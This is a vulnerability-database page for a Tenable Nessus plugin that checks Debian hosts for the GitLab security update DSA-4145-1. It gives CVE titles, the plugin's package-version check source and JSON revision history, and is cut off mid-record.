Search...

Debian DSA-4145-1 : gitlab - security update

2018-03-19T00:00:00

ID DEBIAN_DSA-4145.NASL
Type nessus
Reporter This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.
Modified 2019-12-02T00:00:00

Description

Several vulnerabilities have been discovered in Gitlab, a software platform to collaborate on code :

CVE-2017-0915/ CVE-2018-3710 Arbitrary code execution in project import.

CVE-2017-0916 Command injection via Webhooks.

CVE-2017-0917 Cross-site scripting in CI job output.

CVE-2017-0918 Insufficient restriction of CI runner for project cache access.

CVE-2017-0925 Information disclosure in Services API.

CVE-2017-0926 Restrictions for disabled OAuth providers could be bypassed.

                                        
                                            #
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were  
# extracted from Debian Security Advisory DSA-4145. The text 
# itself is copyright (C) Software in the Public Interest, Inc.
#

include("compat.inc");

if (description)
{
  script_id(108422);
  script_version("1.6");
  script_cvs_date("Date: 2018/11/13 12:30:46");

  script_cve_id("CVE-2017-0915", "CVE-2017-0916", "CVE-2017-0917", "CVE-2017-0918", "CVE-2017-0925", "CVE-2017-0926", "CVE-2018-3710");
  script_xref(name:"DSA", value:"4145");

  script_name(english:"Debian DSA-4145-1 : gitlab - security update");
  script_summary(english:"Checks dpkg output for the updated package");

  script_set_attribute(
    attribute:"synopsis", 
    value:"The remote Debian host is missing a security-related update."
  );
  script_set_attribute(
    attribute:"description", 
    value:
"Several vulnerabilities have been discovered in Gitlab, a software
platform to collaborate on code :

  - CVE-2017-0915/ CVE-2018-3710
    Arbitrary code execution in project import.

  - CVE-2017-0916
    Command injection via Webhooks.

  - CVE-2017-0917
    Cross-site scripting in CI job output.

  - CVE-2017-0918
    Insufficient restriction of CI runner for project cache
    access.

  - CVE-2017-0925
    Information disclosure in Services API.

  - CVE-2017-0926
    Restrictions for disabled OAuth providers could be
    bypassed."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://security-tracker.debian.org/tracker/CVE-2017-0915"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://security-tracker.debian.org/tracker/CVE-2018-3710"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://security-tracker.debian.org/tracker/CVE-2017-0916"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://security-tracker.debian.org/tracker/CVE-2017-0917"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://security-tracker.debian.org/tracker/CVE-2017-0918"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://security-tracker.debian.org/tracker/CVE-2017-0925"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://security-tracker.debian.org/tracker/CVE-2017-0926"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://security-tracker.debian.org/tracker/source-package/gitlab"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://packages.debian.org/source/stretch/gitlab"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.debian.org/security/2018/dsa-4145"
  );
  script_set_attribute(
    attribute:"solution", 
    value:
"Upgrade the gitlab packages.

For the stable distribution (stretch), these problems have been fixed
in version 8.13.11+dfsg1-8+deb9u1."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:gitlab");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:9.0");

  script_set_attribute(attribute:"patch_publication_date", value:"2018/03/18");
  script_set_attribute(attribute:"plugin_publication_date", value:"2018/03/19");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"Debian Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l");

  exit(0);
}


include("audit.inc");
include("debian_package.inc");


if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian");
if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING);


flag = 0;
if (deb_check(release:"9.0", prefix:"gitlab", reference:"8.13.11+dfsg1-8+deb9u1")) flag++;

if (flag)
{
  if (report_verbosity &gt; 0) security_hole(port:0, extra:deb_report_get());
  else security_hole(0);
  exit(0);
}
else audit(AUDIT_HOST_NOT, "affected");

JSON Vulners Source

Initial Source

{"id": "DEBIAN_DSA-4145.NASL", "bulletinFamily": "scanner", "title": "Debian DSA-4145-1 : gitlab - security update", "description": "Several vulnerabilities have been discovered in Gitlab, a software\nplatform to collaborate on code :\n\n - CVE-2017-0915/ CVE-2018-3710\n Arbitrary code execution in project import.\n\n - CVE-2017-0916\n Command injection via Webhooks.\n\n - CVE-2017-0917\n Cross-site scripting in CI job output.\n\n - CVE-2017-0918\n Insufficient restriction of CI runner for project cache\n access.\n\n - CVE-2017-0925\n Information disclosure in Services API.\n\n - CVE-2017-0926\n Restrictions for disabled OAuth providers could be\n bypassed.", "published": "2018-03-19T00:00:00", "modified": "2019-12-02T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/108422", "reporter": "This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://www.debian.org/security/2018/dsa-4145", "https://security-tracker.debian.org/tracker/CVE-2018-3710", "https://security-tracker.debian.org/tracker/CVE-2017-0925", "https://security-tracker.debian.org/tracker/CVE-2017-0918", "https://security-tracker.debian.org/tracker/CVE-2017-0926", "https://security-tracker.debian.org/tracker/CVE-2017-0916", "https://security-tracker.debian.org/tracker/source-package/gitlab", "https://packages.debian.org/source/stretch/gitlab", "https://security-tracker.debian.org/tracker/CVE-2017-0915", "https://security-tracker.debian.org/tracker/CVE-2017-0917"], "cvelist": ["CVE-2017-0917", "CVE-2017-0915", "CVE-2018-3710", "CVE-2017-0916", "CVE-2017-0926", "CVE-2017-0925", "CVE-2017-0918"], "type": "nessus", "lastseen": "2019-12-13T06:53:31", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:debian:debian_linux:gitlab", "cpe:/o:debian:debian_linux:9.0"], "cvelist": ["CVE-2017-0917", "CVE-2017-0915", "CVE-2018-3710", "CVE-2017-0916", "CVE-2017-0926", "CVE-2017-0925", "CVE-2017-0918"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "description": "Several vulnerabilities have been discovered in Gitlab, a software\nplatform to collaborate on code :\n\n - CVE-2017-0915/ CVE-2018-3710\n Arbitrary code execution in project import.\n\n - CVE-2017-0916\n Command injection via Webhooks.\n\n - CVE-2017-0917\n Cross-site scripting in CI job output.\n\n - CVE-2017-0918\n Insufficient restriction of CI runner for project cache\n access.\n\n - CVE-2017-0925\n Information disclosure in Services API.\n\n - CVE-2017-0926\n Restrictions for disabled OAuth providers could be\n bypassed.", "edition": 13, "enchantments": {"dependencies": {"modified": "2019-11-01T02:22:26", "references": [{"idList": ["DEBIAN:DSA-4145-1:42E35"], "type": "debian"}, {"idList": ["OPENVAS:1361412562310704145"], "type": "openvas"}, {"idList": ["65FAB89F-2231-46DB-8541-978F4E87F32A"], "type": "freebsd"}, {"idList": ["CVE-2017-0917", "CVE-2017-0915", "CVE-2018-3710", "CVE-2017-0916", "CVE-2017-0926", "CVE-2017-0925", "CVE-2017-0918"], "type": "cve"}, {"idList": ["FREEBSD_PKG_65FAB89F223146DB8541978F4E87F32A.NASL"], "type": "nessus"}, {"idList": ["H1:301432", "H1:299473", "H1:298873"], "type": "hackerone"}]}, "score": {"modified": "2019-11-01T02:22:26", "value": 6.8, "vector": "NONE"}}, "hash": "b9199df739d0e729369e425a861fa160faa4d106a09ac81053ff35dd480e087c", "hashmap": [{"hash": "353d91f2df442080de42f503ab3f278a", "key": "pluginID"}, {"hash": "94e682f572219e238e994f47a76a97b6", "key": "description"}, {"hash": "abcf9266f425f12dda38f529cd4a94bc", "key": "modified"}, {"hash": "205fa18cac3fc8ebbd32824afb096581", "key": "reporter"}, {"hash": "a088969e3ffa3a71ffb3ea0f49ec5460", "key": "references"}, {"hash": "fa07a5338e88503fd255af6837f9bb02", "key": "cvelist"}, {"hash": "e88870015da22affb99f52db5769bb53", "key": "href"}, {"hash": "dad3bf4df09046812026f13c33e8f983", "key": "sourceData"}, {"hash": "b5f4279a86e8ad7e7d5cdcfce85f13b7", "key": "title"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "3f9580fb30f5ae7e1d8713dad8807aa6", "key": "cpe"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "76e8782b29cfd39782ffd31ec97c3583", "key": "published"}, {"hash": "74562d71b087df9eabd0c21f99b132cc", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/108422", "id": "DEBIAN_DSA-4145.NASL", "lastseen": "2019-11-01T02:22:26", "modified": "2019-11-02T00:00:00", "naslFamily": "Debian Local Security Checks", "objectVersion": "1.3", "pluginID": "108422", "published": "2018-03-19T00:00:00", "references": ["https://www.debian.org/security/2018/dsa-4145", "https://security-tracker.debian.org/tracker/CVE-2018-3710", "https://security-tracker.debian.org/tracker/CVE-2017-0925", "https://security-tracker.debian.org/tracker/CVE-2017-0918", "https://security-tracker.debian.org/tracker/CVE-2017-0926", "https://security-tracker.debian.org/tracker/CVE-2017-0916", "https://security-tracker.debian.org/tracker/source-package/gitlab", "https://packages.debian.org/source/stretch/gitlab", "https://security-tracker.debian.org/tracker/CVE-2017-0915", "https://security-tracker.debian.org/tracker/CVE-2017-0917"], "reporter": "This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4145. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108422);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/11/13 12:30:46\");\n\n script_cve_id(\"CVE-2017-0915\", \"CVE-2017-0916\", \"CVE-2017-0917\", \"CVE-2017-0918\", \"CVE-2017-0925\", \"CVE-2017-0926\", \"CVE-2018-3710\");\n script_xref(name:\"DSA\", value:\"4145\");\n\n script_name(english:\"Debian DSA-4145-1 : gitlab - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in Gitlab, a software\nplatform to collaborate on code :\n\n - CVE-2017-0915/ CVE-2018-3710\n Arbitrary code execution in project import.\n\n - CVE-2017-0916\n Command injection via Webhooks.\n\n - CVE-2017-0917\n Cross-site scripting in CI job output.\n\n - CVE-2017-0918\n Insufficient restriction of CI runner for project cache\n access.\n\n - CVE-2017-0925\n Information disclosure in Services API.\n\n - CVE-2017-0926\n Restrictions for disabled OAuth providers could be\n bypassed.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0915\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-3710\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0916\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0917\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0918\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0925\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0926\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/gitlab\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/gitlab\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2018/dsa-4145\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the gitlab packages.\n\nFor the stable distribution (stretch), these problems have been fixed\nin version 8.13.11+dfsg1-8+deb9u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:gitlab\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"gitlab\", reference:\"8.13.11+dfsg1-8+deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "Debian DSA-4145-1 : gitlab - security update", "type": "nessus", "viewCount": 4}, "differentElements": ["modified"], "edition": 13, "lastseen": "2019-11-01T02:22:26"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:debian:debian_linux:gitlab", "cpe:/o:debian:debian_linux:9.0"], "cvelist": ["CVE-2017-0917", "CVE-2017-0915", "CVE-2018-3710", "CVE-2017-0916", "CVE-2017-0926", "CVE-2017-0925", "CVE-2017-0918"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "Several vulnerabilities have been discovered in Gitlab, a software platform to collaborate on code :\n\n - CVE-2017-0915/ CVE-2018-3710 Arbitrary code execution in project import.\n\n - CVE-2017-0916 Command injection via Webhooks.\n\n - CVE-2017-0917 Cross-site scripting in CI job output.\n\n - CVE-2017-0918 Insufficient restriction of CI runner for project cache access.\n\n - CVE-2017-0925 Information disclosure in Services API.\n\n - CVE-2017-0926 Restrictions for disabled OAuth providers could be bypassed.", "edition": 5, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "hash": "9c5c1ae0ef6ea3147a465da55a49b0963a3870bf0cedf8ab92939a03de79792f", "hashmap": [{"hash": "6345a07519080def10bf765f22c5b146", "key": "description"}, {"hash": "353d91f2df442080de42f503ab3f278a", "key": "pluginID"}, {"hash": "5ba3c9d875bfe1d4088cbfd233ef0c85", "key": "modified"}, {"hash": "d0083786fa4896023b7e89b86eaea16e", "key": "sourceData"}, {"hash": "6b7d85728983a5229fdfdc41c6b30a78", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "fa07a5338e88503fd255af6837f9bb02", "key": "cvelist"}, {"hash": "b5f4279a86e8ad7e7d5cdcfce85f13b7", "key": "title"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "3f9580fb30f5ae7e1d8713dad8807aa6", "key": "cpe"}, {"hash": "76e8782b29cfd39782ffd31ec97c3583", "key": "published"}, {"hash": "ceec059fe53d22b2aa62a742623bc8e1", "key": "href"}, {"hash": "74562d71b087df9eabd0c21f99b132cc", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=108422", "id": "DEBIAN_DSA-4145.NASL", "lastseen": "2018-04-19T00:13:26", "modified": "2018-04-18T00:00:00", "naslFamily": "Debian Local Security Checks", "objectVersion": "1.3", "pluginID": "108422", "published": "2018-03-19T00:00:00", "references": ["http://www.debian.org/security/2018/dsa-4145", "https://security-tracker.debian.org/tracker/CVE-2018-3710", "https://security-tracker.debian.org/tracker/CVE-2017-0925", "https://security-tracker.debian.org/tracker/CVE-2017-0918", "https://security-tracker.debian.org/tracker/CVE-2017-0926", "https://security-tracker.debian.org/tracker/CVE-2017-0916", "https://packages.debian.org/source/stretch/gitlab", "https://security-tracker.debian.org/tracker/CVE-2017-0915", "https://security-tracker.debian.org/tracker/gitlab", "https://security-tracker.debian.org/tracker/CVE-2017-0917"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4145. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108422);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/04/18 11:50:33\");\n\n script_cve_id(\"CVE-2017-0915\", \"CVE-2017-0916\", \"CVE-2017-0917\", \"CVE-2017-0918\", \"CVE-2017-0925\", \"CVE-2017-0926\", \"CVE-2018-3710\");\n script_xref(name:\"DSA\", value:\"4145\");\n\n script_name(english:\"Debian DSA-4145-1 : gitlab - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in Gitlab, a software\nplatform to collaborate on code :\n\n - CVE-2017-0915/ CVE-2018-3710\n Arbitrary code execution in project import.\n\n - CVE-2017-0916\n Command injection via Webhooks.\n\n - CVE-2017-0917\n Cross-site scripting in CI job output.\n\n - CVE-2017-0918\n Insufficient restriction of CI runner for project cache\n access.\n\n - CVE-2017-0925\n Information disclosure in Services API.\n\n - CVE-2017-0926\n Restrictions for disabled OAuth providers could be\n bypassed.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0915\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-3710\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0916\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0917\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0918\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0925\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0926\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/gitlab\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/gitlab\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2018/dsa-4145\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the gitlab packages.\n\nFor the stable distribution (stretch), these problems have been fixed\nin version 8.13.11+dfsg1-8+deb9u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:gitlab\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"gitlab\", reference:\"8.13.11+dfsg1-8+deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "Debian DSA-4145-1 : gitlab - security update", "type": "nessus", "viewCount": 1}, "differentElements": ["cvss"], "edition": 5, "lastseen": "2018-04-19T00:13:26"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:debian:debian_linux:gitlab", "cpe:/o:debian:debian_linux:9.0"], "cvelist": ["CVE-2017-0917", "CVE-2017-0915", "CVE-2018-3710", "CVE-2017-0916", "CVE-2017-0926", "CVE-2017-0925", "CVE-2017-0918"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "description": "Several vulnerabilities have been discovered in Gitlab, a software\nplatform to collaborate on code :\n\n - CVE-2017-0915/ CVE-2018-3710\n Arbitrary code execution in project import.\n\n - CVE-2017-0916\n Command injection via Webhooks.\n\n - CVE-2017-0917\n Cross-site scripting in CI job output.\n\n - CVE-2017-0918\n Insufficient restriction of CI runner for project cache\n access.\n\n - CVE-2017-0925\n Information disclosure in Services API.\n\n - CVE-2017-0926\n Restrictions for disabled OAuth providers could be\n bypassed.", "edition": 12, "enchantments": {"dependencies": {"modified": "2019-10-28T20:07:08", "references": [{"idList": ["DEBIAN:DSA-4145-1:42E35"], "type": "debian"}, {"idList": ["OPENVAS:1361412562310704145"], "type": "openvas"}, {"idList": ["65FAB89F-2231-46DB-8541-978F4E87F32A"], "type": "freebsd"}, {"idList": ["CVE-2017-0917", "CVE-2017-0915", "CVE-2018-3710", "CVE-2017-0916", "CVE-2017-0926", "CVE-2017-0925", "CVE-2017-0918"], "type": "cve"}, {"idList": ["FREEBSD_PKG_65FAB89F223146DB8541978F4E87F32A.NASL"], "type": "nessus"}, {"idList": ["H1:301432", "H1:299473", "H1:298873"], "type": "hackerone"}]}, "score": {"modified": "2019-10-28T20:07:08", "value": 6.8, "vector": "NONE"}}, "hash": "78b4453871ba50169ca3e967e6abeeb77bedd721faef9d98184a4323c41abfc2", "hashmap": [{"hash": "353d91f2df442080de42f503ab3f278a", "key": "pluginID"}, {"hash": "94e682f572219e238e994f47a76a97b6", "key": "description"}, {"hash": "205fa18cac3fc8ebbd32824afb096581", "key": "reporter"}, {"hash": "a088969e3ffa3a71ffb3ea0f49ec5460", "key": "references"}, {"hash": "fa07a5338e88503fd255af6837f9bb02", "key": "cvelist"}, {"hash": "e88870015da22affb99f52db5769bb53", "key": "href"}, {"hash": "dad3bf4df09046812026f13c33e8f983", "key": "sourceData"}, {"hash": "b5f4279a86e8ad7e7d5cdcfce85f13b7", "key": "title"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0bafb6325bcaf483a25404f785191cc5", "key": "modified"}, {"hash": "3f9580fb30f5ae7e1d8713dad8807aa6", "key": "cpe"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "76e8782b29cfd39782ffd31ec97c3583", "key": "published"}, {"hash": "74562d71b087df9eabd0c21f99b132cc", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/108422", "id": "DEBIAN_DSA-4145.NASL", "lastseen": "2019-10-28T20:07:08", "modified": "2019-10-02T00:00:00", "naslFamily": "Debian Local Security Checks", "objectVersion": "1.3", "pluginID": "108422", "published": "2018-03-19T00:00:00", "references": ["https://www.debian.org/security/2018/dsa-4145", "https://security-tracker.debian.org/tracker/CVE-2018-3710", "https://security-tracker.debian.org/tracker/CVE-2017-0925", "https://security-tracker.debian.org/tracker/CVE-2017-0918", "https://security-tracker.debian.org/tracker/CVE-2017-0926", "https://security-tracker.debian.org/tracker/CVE-2017-0916", "https://security-tracker.debian.org/tracker/source-package/gitlab", "https://packages.debian.org/source/stretch/gitlab", "https://security-tracker.debian.org/tracker/CVE-2017-0915", "https://security-tracker.debian.org/tracker/CVE-2017-0917"], "reporter": "This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4145. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108422);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/11/13 12:30:46\");\n\n script_cve_id(\"CVE-2017-0915\", \"CVE-2017-0916\", \"CVE-2017-0917\", \"CVE-2017-0918\", \"CVE-2017-0925\", \"CVE-2017-0926\", \"CVE-2018-3710\");\n script_xref(name:\"DSA\", value:\"4145\");\n\n script_name(english:\"Debian DSA-4145-1 : gitlab - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in Gitlab, a software\nplatform to collaborate on code :\n\n - CVE-2017-0915/ CVE-2018-3710\n Arbitrary code execution in project import.\n\n - CVE-2017-0916\n Command injection via Webhooks.\n\n - CVE-2017-0917\n Cross-site scripting in CI job output.\n\n - CVE-2017-0918\n Insufficient restriction of CI runner for project cache\n access.\n\n - CVE-2017-0925\n Information disclosure in Services API.\n\n - CVE-2017-0926\n Restrictions for disabled OAuth providers could be\n bypassed.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0915\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-3710\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0916\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0917\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0918\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0925\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0926\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/gitlab\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/gitlab\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2018/dsa-4145\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the gitlab packages.\n\nFor the stable distribution (stretch), these problems have been fixed\nin version 8.13.11+dfsg1-8+deb9u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:gitlab\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate 